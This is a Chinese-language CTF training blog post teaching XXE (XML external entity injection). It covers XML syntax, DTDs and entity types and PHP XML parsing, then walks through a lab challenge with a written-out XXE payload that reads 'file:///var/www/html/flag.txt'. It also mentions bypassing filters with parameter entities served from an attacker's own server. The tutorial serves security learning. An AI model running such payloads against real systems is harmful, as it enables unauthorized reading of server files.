<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 8.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/sign.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/small.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"hnu-legend1440.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="飞书链接:https:&#x2F;&#x2F;icnewi51k2yp.feishu.cn&#x2F;wiki&#x2F;N0VgwhvoSiOj2OkWQqVcMirvnmb [10.1]XXE 漏洞绪论XXE 漏洞简介XXE 漏洞全称 XML External Entity Injection 即 xml 外部实体注入漏洞，XXE 漏洞发生在应用程序解析 XML 输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、">
<meta property="og:type" content="article">
<meta property="og:title" content="第十章-XXE漏洞">
<meta property="og:url" content="http://hnu-legend1440.com/2026/01/25/%E7%AC%AC%E5%8D%81%E7%AB%A0-XXE%E6%BC%8F%E6%B4%9E/index.html">
<meta property="og:site_name" content="拂云观 · legend1440">
<meta property="og:description" content="飞书链接:https:&#x2F;&#x2F;icnewi51k2yp.feishu.cn&#x2F;wiki&#x2F;N0VgwhvoSiOj2OkWQqVcMirvnmb [10.1]XXE 漏洞绪论XXE 漏洞简介XXE 漏洞全称 XML External Entity Injection 即 xml 外部实体注入漏洞，XXE 漏洞发生在应用程序解析 XML 输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://hnu-legend1440.com/images/HdiKbIN2yo1sIoxLG1kcornMnIe.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/BnEmbpMguo7En0xvPy0cOylUnSg.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/GA6bb6pb0opiJAx0ZfRch45Vn9g.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/CkQXbfRlwokY6ZxHlCXcDJK6nvg.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/IPiFbC6tLoPv62xViE2cUEfSncn.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/AoE5bPz0xoaxvFxUxRFcqE7UnCh.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/BnkhbfAMho8vc8xV0CgcuSsOnUf.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/L76SbQQ8LovuiNxo1eGcGPBZn6f.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/JETlb4bcMoqqOPxL88KcZEhFnCf.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/ZNc1bal0doHvebx8V6Ic1Tznnfe.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/QrKdbYScboob2XxzybzcOBWBnQc.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/LgEAbzJ0xoQnYjxQyjmc9jeGnpd.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/PirabbaaIoBw6hxw28lcjDRQnng.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/JJjnbEb1NoLGE0xbZayc4HtNn7b.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/L2oFbTKlDogkmOx0urEcQGQJnke.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/WJhrb3vvZo7sr1x5p2VcneD0n68.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/XOxKbeL2Foc6jpxA5YFcCEMMnWg.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/E2NwbkM8VoGDw5xMgXgcSA9LnTd.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/UNCtbKcZMofgL2xol7cctO76nac.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/XqMMbVBErofnogxIhKOcOCZWnqh.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/U5uZbJ1wGoYJw8xz6dgcem4Vns7.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/PjxXbKCZQoiqy0x4pm2chlnlnmg.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/UdDqb9u1Eo4uPixdEJFcFzd3ngf.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/CWjCb9SkQo5ex7xGz1ncHDUDncc.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/VUi3bizzeoyXE7xbqUJcrKc8nif.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/YRwwbCiomoUcVHxbekacCSV8nXg.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/QUCKb55JMo11Z6xVHrdcr5iRnBh.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/E5l1bV0YWoioMhxcCMocJLaPnYe.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/OLJlbejKdoYz9rxChBVc42U5nid.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/BoXhbm3hyo9VTexHFzhcswnTnDe.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/OBEDbv6xJoGW7wxicD8cyZGsnYc.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/Mw0NbQT2DoQ71GxNmMkcoLpJn1e.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/AxGbbcpiqoP8HxxiKFac8TgcnGh.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/VIu2bWDgNoXG8oxh1E7cPtU7nqe.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/VwVPbN8kboyCUcxBOt9cLZ6WnTd.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/KF9TbHNGNoidEJx5ZMKcy41Xnzc.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/Ki7MbfXiioxlpsxld7EcMq3OnGg.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/TKoTbD4nCoTsWixxsDKcj5Jtncg.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/LfXRbMr0koiR1ExHkKBcCrR6n8s.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/Qw1ybheoEoVgKCxM4MhcYRTEnPe.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/YkKob3cPMogcNPxxLfKcUHLfn0f.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/D2SnbxGCjoqvKJx3ANKcL03ynSh.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/OIU6bXVUZohLq1xT7SpcLzoNnJh.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/DLyJba1yNoqjeFxU6AScxJ6xn40.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/EDRSb42AFobNEcxdsbuc4pFFnEe.png">
<meta property="og:image" content="http://hnu-legend1440.com/images/GFy4baD6UoCetTxtjbRcGEFEnEc.png">
<meta property="article:published_time" content="2026-01-25T03:00:00.000Z">
<meta property="article:modified_time" content="2026-02-08T06:48:04.832Z">
<meta property="article:author" content="legend1440">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://hnu-legend1440.com/images/HdiKbIN2yo1sIoxLG1kcornMnIe.png">

<link rel="canonical" href="http://hnu-legend1440.com/2026/01/25/%E7%AC%AC%E5%8D%81%E7%AB%A0-XXE%E6%BC%8F%E6%B4%9E/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>第十章-XXE漏洞 | 拂云观 · legend1440</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<!-- hexo injector head_end start --><link rel="stylesheet" href="/Blog-Like/style.css">
<script src="/Blog-Like/Blog-Like.js"></script><!-- hexo injector head_end end --></head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">拂云观 · legend1440</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/categories/schedule/" rel="section"><i class="fa fa-skating fa-fw"></i>期末突击</a>

  </li>
        <li class="menu-item menu-item-training">

    <a href="/categories/training/" rel="section"><i class="fa fa-yin-yang fa-fw"></i>集训修行</a>

  </li>
        <li class="menu-item menu-item-wp">

    <a href="/categories/WP/" rel="section"><i class="fa fa-feather fa-fw"></i>全面战场</a>

  </li>
        <li class="menu-item menu-item-puzzles">

    <a href="/categories/puzzles/" rel="section"><i class="fa fa-spa fa-fw"></i>练习札记</a>

  </li>
        <li class="menu-item menu-item-server">

    <a href="/categories/server/" rel="section"><i class="fa fa-star fa-fw"></i>服务器风采</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://hnu-legend1440.com/2026/01/25/%E7%AC%AC%E5%8D%81%E7%AB%A0-XXE%E6%BC%8F%E6%B4%9E/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="legend1440">
      <meta itemprop="description" content="前进中的CTF-web现役队员">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="拂云观 · legend1440">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          第十章-XXE漏洞
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2026-01-25 11:00:00" itemprop="dateCreated datePublished" datetime="2026-01-25T11:00:00+08:00">2026-01-25</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2026-02-08 14:48:04" itemprop="dateModified" datetime="2026-02-08T14:48:04+08:00">2026-02-08</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/training/" itemprop="url" rel="index"><span itemprop="name">-training</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>飞书链接:<a target="_blank" rel="noopener" href="https://icnewi51k2yp.feishu.cn/wiki/N0VgwhvoSiOj2OkWQqVcMirvnmb">https://icnewi51k2yp.feishu.cn/wiki/N0VgwhvoSiOj2OkWQqVcMirvnmb</a></p>
<h1 id="10-1-XXE-漏洞绪论"><a href="#10-1-XXE-漏洞绪论" class="headerlink" title="[10.1]XXE 漏洞绪论"></a>[10.1]XXE 漏洞绪论</h1><h2 id="XXE-漏洞简介"><a href="#XXE-漏洞简介" class="headerlink" title="XXE 漏洞简介"></a>XXE 漏洞简介</h2><p>XXE 漏洞全称 XML External Entity Injection 即 xml 外部实体注入漏洞，XXE 漏洞发生在应用程序解析 XML 输入时，没有禁止外部实体的加载，导致可加载恶意外部文件，造成文件读取、命令执行、内网端口扫描、攻击内网网站、发起 dos 攻击等危害。xxe 漏洞触发的点往往是可以上传 xml 文件的位置，没有对上传的 xml 文件进行过滤，导致可上传恶意 xml 文件。</p>
<p>XXE 的核心逻辑是<strong>用 XML 的 “外部引用” 功能，骗网站的解析器帮你读取文件、探测内网 —— 本质是解析器 “不设防”，被你利用当工具人。</strong></p>
<p>学会 XXE，我们得先学会 xml 的基本语法</p>
<h2 id="xml-语言"><a href="#xml-语言" class="headerlink" title="xml 语言"></a>xml 语言</h2><h3 id="xml-介绍"><a href="#xml-介绍" class="headerlink" title="xml 介绍"></a>xml 介绍</h3><p>XML 指<strong>可扩展标记语言（EXtensible Markup Language)</strong></p>
<p>把数据以特定的方法结构化后传输给对方，让对方在结构化的数据中进行读取。</p>
<p>与 html 不同的是，xml 标签没有被预定义，需要自行定义标签。</p>
<p><img src="/images/HdiKbIN2yo1sIoxLG1kcornMnIe.png"></p>
<p>XML 语言形如这样</p>
<p><img src="/images/BnEmbpMguo7En0xvPy0cOylUnSg.png"></p>
<p>下面我们稍微介绍一下 xml 的语法</p>
<h3 id="xml-语法"><a href="#xml-语法" class="headerlink" title="xml 语法"></a>xml 语法</h3><p>首先要说明的是</p>
<p>1.xml 标签一定是需要闭合的双标签，且 xml 必须进行正确嵌套.</p>
<p>2.XML 标签对大小写敏感</p>
<p><img src="/images/GA6bb6pb0opiJAx0ZfRch45Vn9g.png"></p>
<p>3.XML 文档必须有根元素，根元素的名字通常使用 root，但也不是绝对的</p>
<p><img src="/images/CkQXbfRlwokY6ZxHlCXcDJK6nvg.png"></p>
<p>4.XML 无缩进要求 但建议进行首行缩进便于阅读</p>
<p>5.头声明问题</p>
<p><img src="/images/IPiFbC6tLoPv62xViE2cUEfSncn.png"></p>
<p>6.实体引用</p>
<p>在 XML 中，一些字符拥有特殊的意义。</p>
<p>如果你把字符’&lt;’放在 XML 元素中，会发生错误，这是因为解析器会把它当作新元素的开始。</p>
<p><img src="/images/AoE5bPz0xoaxvFxUxRFcqE7UnCh.png"></p>
<p>为了避免这个错误，我们必须用实体引用来代替</p>
<p><img src="/images/BnkhbfAMho8vc8xV0CgcuSsOnUf.png"></p>
<h4 id="实体引用的语法"><a href="#实体引用的语法" class="headerlink" title="实体引用的语法"></a>实体引用的语法</h4><p><img src="/images/L76SbQQ8LovuiNxo1eGcGPBZn6f.png"></p>
<h2 id="使用-php-解析-xml"><a href="#使用-php-解析-xml" class="headerlink" title="使用 php 解析 xml"></a>使用 php 解析 xml</h2><h3 id="simplexml-load-file-函数"><a href="#simplexml-load-file-函数" class="headerlink" title="simplexml_load_file()函数"></a>simplexml_load_file()函数</h3><p>simplexml_load_file()函数把 XML 文档载入对象中；print_r 打印显示变量 $xml。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$xml</span>=<span class="title function_ invoke__">simplexml_load_file</span>(<span class="string">&quot;1.xml&quot;</span>);</span><br><span class="line"><span class="title function_ invoke__">print_r</span>(<span class="variable">$xml</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>直接打印 $xml，会以类似反序列化的方式打印对象</p>
<p><img src="/images/JETlb4bcMoqqOPxL88KcZEhFnCf.png"></p>
<p>而 $xml 也可以当做一个对象，引用其中的成员</p>
<p><img src="/images/ZNc1bal0doHvebx8V6Ic1Tznnfe.png"></p>
<h3 id="使用-DOMDocument-读取-XML-文档"><a href="#使用-DOMDocument-读取-XML-文档" class="headerlink" title="使用 DOMDocument 读取 XML 文档"></a>使用 DOMDocument 读取 XML 文档</h3><p>数据通常以 POST 方式把字符串提交进去，以 xml 结构提交给目标网站，再通过 php 伪协议读取内容，进行 xml 解析</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$doc</span> = <span class="keyword">new</span> <span class="title class_">DOMDocument</span>();</span><br></pre></td></tr></table></figure>

<p>注意：DOMDocument 是个类，需要先实例化为对象，以调用其成员方法</p>
<p>读取的方法有两种</p>
<p><img src="/images/QrKdbYScboob2XxzybzcOBWBnQc.png"></p>
<p>或者</p>
<p><img src="/images/LgEAbzJ0xoQnYjxQyjmc9jeGnpd.png"></p>
<p>读取特定节点值的语法结构</p>
<p><img src="/images/PirabbaaIoBw6hxw28lcjDRQnng.png"></p>
<h3 id="混合使用读取-xml-文档"><a href="#混合使用读取-xml-文档" class="headerlink" title="混合使用读取 xml 文档"></a>混合使用读取 xml 文档</h3><p><img src="/images/JJjnbEb1NoLGE0xbZayc4HtNn7b.png"></p>
<p>注意</p>
<p>第 3,4 行可以用 load 合并 $doc-&gt;load(“1.xml”)</p>
<p>第 5 行又把这个文件转成一个具有成员的对象</p>
<h2 id="DTD-声明"><a href="#DTD-声明" class="headerlink" title="DTD 声明"></a>DTD 声明</h2><p>**文档类型定义（DTD）**可定义合法的 XML 文档构建模块。</p>
<p>它使用一系列合法的元素来定义文档的结构。</p>
<p>在 XML 中可以自定义标记，DTD 用来定义我们自己定义的</p>
<p>标记的含义，我们自己定义元素的相关属性的文档。它规定和约束 XML 规则的定义和陈述。</p>
<p><strong>DTD 可被成行地声明于 XML 文档中，也可作为一个**<strong>外部引用</strong></strong>。**</p>
<p><img src="/images/L2oFbTKlDogkmOx0urEcQGQJnke.png"></p>
<p>一些元素要特别记住</p>
<p>!ELEMENT 定义元素</p>
<p>!ATTLIST 定义元素的属性</p>
<p>!NOTATION 定义不被解释为</p>
<p>元素或属性的符号</p>
<p>!ENTITY 定义实体，这些实体</p>
<p>可以再 XML 文档中被引用</p>
<h3 id="外部引用-DTD-文件"><a href="#外部引用-DTD-文件" class="headerlink" title="外部引用 DTD 文件"></a><strong>外部引用 DTD 文件</strong></h3><p>可以先把 DTD 的代码写到一个 dtd 文件中，再使用本行进行外部引用</p>
<p><img src="/images/WJhrb3vvZo7sr1x5p2VcneD0n68.png"></p>
<p>注意框选行的 root 名字可以随便起，不影响程序执行</p>
<p>而 1.DTD 的读取等，可能会引起文件包含漏洞，我们下一节介绍</p>
<p><img src="/images/XOxKbeL2Foc6jpxA5YFcCEMMnWg.png"></p>
<h2 id="XML-实体"><a href="#XML-实体" class="headerlink" title="XML 实体"></a>XML 实体</h2><h3 id="实体的含义"><a href="#实体的含义" class="headerlink" title="实体的含义"></a>实体的含义</h3><p>实体是对数据的引用；根据实体种类的不同，XML 解析器将使用实体的替代文本或者外部文档的内容来替代实体引用。</p>
<p>前面我们也提到过实体引用代替符号</p>
<p><strong>所有实体（除参数实体外）都以一个与字符（&amp;）开始，以一个分号（）结束。</strong></p>
<h3 id="字符实体"><a href="#字符实体" class="headerlink" title="字符实体"></a>字符实体</h3><p>字符实体是约定俗成的，不需要预定义</p>
<p><img src="/images/E2NwbkM8VoGDw5xMgXgcSA9LnTd.png"></p>
<h3 id="命名实体"><a href="#命名实体" class="headerlink" title="命名实体"></a>命名实体</h3><p>命名实体，类似于变量，需要在 DTD 里面用 &lt;!ENTITY&gt; 语句定义，格式如下</p>
<p><img src="/images/UNCtbKcZMofgL2xol7cctO76nac.png"></p>
<p>最后一行会返回:</p>
<p><img src="/images/XqMMbVBErofnogxIhKOcOCZWnqh.png"></p>
<p>当然，命名实体的定义是可以嵌套的</p>
<p><img src="/images/U5uZbJ1wGoYJw8xz6dgcem4Vns7.png"></p>
<p>返回</p>
<p><img src="/images/PjxXbKCZQoiqy0x4pm2chlnlnmg.png"></p>
<h3 id="外部实体"><a href="#外部实体" class="headerlink" title="外部实体"></a>外部实体</h3><p>外部调用文件，是 XXE 漏洞产生的主要原因</p>
<p><img src="/images/UdDqb9u1Eo4uPixdEJFcFzd3ngf.png"></p>
<p>命名实体的双引号中用 file 伪协议读取文件，前面还要加个 SYSTEM 再引用这个变量 便可以得到这个变量背后的文件内容，从而做到任意文件读取，后续漏洞介绍也会提到</p>
<h3 id="参数实体"><a href="#参数实体" class="headerlink" title="参数实体"></a>参数实体</h3><p>参数实体以百分号 % 开头，目的是能够创建替换文本的可重用部分。</p>
<p><img src="/images/CWjCb9SkQo5ex7xGz1ncHDUDncc.png"></p>
<p>等价于</p>
<p><img src="/images/VUi3bizzeoyXE7xbqUJcrKc8nif.png"></p>
<p>注意分号不能丢了</p>
<h1 id="10-2-XXE-漏洞利用"><a href="#10-2-XXE-漏洞利用" class="headerlink" title="[10.2]XXE 漏洞利用"></a>[10.2]XXE 漏洞利用</h1><p><em>注:XXE 靶场在本节作为举例出现的题目，本章实验就不会再出现了</em></p>
<h2 id="判断-XXE-漏洞的方法"><a href="#判断-XXE-漏洞的方法" class="headerlink" title="判断 XXE 漏洞的方法"></a>判断 XXE 漏洞的方法</h2><p>一般的 XXE 漏洞，是<strong>基于伪造请求头的</strong></p>
<p>1.读源码，观察是否有读取 xml 相关的 php 代码</p>
<p><a target="_blank" rel="noopener" href="https://icnewi51k2yp.feishu.cn/wiki/AX9SwXsOjiaGbLkghSYc80S6nCS">实验</a>中 GHCTF 那题是一个很好的读源码例子</p>
<p><img src="/images/YRwwbCiomoUcVHxbekacCSV8nXg.png"></p>
<p>2.用 Burp 抓包，观察 get&#x2F;post 请求中有没有 xml 格式的代码</p>
<p>假如题目是一个登录界面，要输入用户名和密码</p>
<p><img src="/images/QUCKb55JMo11Z6xVHrdcr5iRnBh.png"></p>
<p>随便输入用户名和密码，点击登录并使用 Burp 抓包，观察到 xml 格式</p>
<p><img src="/images/E5l1bV0YWoioMhxcCMocJLaPnYe.png"></p>
<p>3.判断回显位</p>
<p>直接从前端判断，回显了’admin’，则’admin’为回显位</p>
<p><img src="/images/OLJlbejKdoYz9rxChBVc42U5nid.png"></p>
<p>使用 Repeater 看响应头，同样找到回显位’admin’</p>
<p><img src="/images/BoXhbm3hyo9VTexHFzhcswnTnDe.png"></p>
<p>4.伪造请求，让 admin 的位置为一个外部实体，采用特殊 xml 代码，让这个实体代表 file 伪协议所读的文件</p>
<p><img src="/images/OBEDbv6xJoGW7wxicD8cyZGsnYc.png"></p>
<p>5.提交请求，则会回显文件内容</p>
<p>下面我们再用一个示例来梳理这些步骤</p>
<h2 id="使用外部实体读取文件-file-协议"><a href="#使用外部实体读取文件-file-协议" class="headerlink" title="使用外部实体读取文件(file 协议)"></a>使用外部实体读取文件(file 协议)</h2><p>使用外部实体读取文件的步骤，在上面已经说的很清楚，但有时候回显位需要用多样的方式判断</p>
<p>我们一起来看看这道例题</p>
<h3 id="例题-第十章-天机符阵"><a href="#例题-第十章-天机符阵" class="headerlink" title="[例题]第十章 天机符阵"></a>[例题]第十章 天机符阵</h3><p>题目有个提示:</p>
<p>flag 在 flag.txt 里</p>
<p>我们需要使用 XXE 任意文件包含的方式来读取该文件</p>
<p>拿到题目，我们先输一个 1，什么也没回显</p>
<p><img src="/images/Mw0NbQT2DoQ71GxNmMkcoLpJn1e.png"></p>
<p>注意到下面有可能定义好的格式</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">阵枢</span>&gt;</span>引魂玉<span class="tag">&lt;/<span class="name">阵枢</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">解析</span>&gt;</span>未定义<span class="tag">&lt;/<span class="name">解析</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">输出</span>&gt;</span>未定义<span class="tag">&lt;/<span class="name">输出</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>我们再将格式复制进去看看回显，注意添加根元素</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">阵枢</span>&gt;</span>1<span class="tag">&lt;/<span class="name">阵枢</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">解析</span>&gt;</span>2<span class="tag">&lt;/<span class="name">解析</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">输出</span>&gt;</span>3<span class="tag">&lt;/<span class="name">输出</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>在前端发现两个回显位 2,3</p>
<p><img src="/images/AxGbbcpiqoP8HxxiKFac8TgcnGh.png"></p>
<p>我们再抓包至 repeater 确认一下</p>
<p><img src="/images/VIu2bWDgNoXG8oxh1E7cPtU7nqe.png"></p>
<p>的确回显了 2,3，因为是中文，所以显示的全是方框</p>
<p>下一步我们需要伪造请求</p>
<p>创建变量名 value 读取 flag.txt 文件，随后引用变量</p>
<p>注意这个 data 可以随意修改，但这个 value 下面要照抄</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="keyword">data</span> [<span class="meta">&lt;!ENTITY <span class="keyword">value</span> <span class="keyword">SYSTEM</span> <span class="string">&quot;file:///var/www/html/flag.txt&quot;</span>&gt;</span>]&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">root</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">阵枢</span>&gt;</span>1<span class="tag">&lt;/<span class="name">阵枢</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">解析</span>&gt;</span><span class="symbol">&amp;value;</span><span class="tag">&lt;/<span class="name">解析</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">输出</span>&gt;</span>3<span class="tag">&lt;/<span class="name">输出</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">root</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>即得 flag</p>
<p><img src="/images/VwVPbN8kboyCUcxBOt9cLZ6WnTd.png"></p>
<p>至于这个文件路径如何找到的，因为我尝试读取过相对路径下 flag(file:&#x2F;&#x2F;flag.txt)，失败了，发现了这么一个路径</p>
<p><img src="/images/KF9TbHNGNoidEJx5ZMKcy41Xnzc.png"></p>
<h2 id="利用参数实体和-HTTP-协议绕过-file-过滤"><a href="#利用参数实体和-HTTP-协议绕过-file-过滤" class="headerlink" title="利用参数实体和 HTTP 协议绕过 file 过滤"></a>利用参数实体和 HTTP 协议绕过 file 过滤</h2><p>外部实体跟在 SYSTEM 后的文件可以使用 http 协议，因此可以自搭一服务器放上一条 DTD 规则</p>
<p>并使用 http 协议去读取它</p>
<p><em>这样就用了一个变量代表你需要注入的 DTD 格式，并通过引用这个变量来执行它</em></p>
<p>因此这需要用不同的服务器事先放好需要的代码，比较难操作，放张图在这理解吧</p>
<p><img src="/images/Ki7MbfXiioxlpsxld7EcMq3OnGg.png"></p>
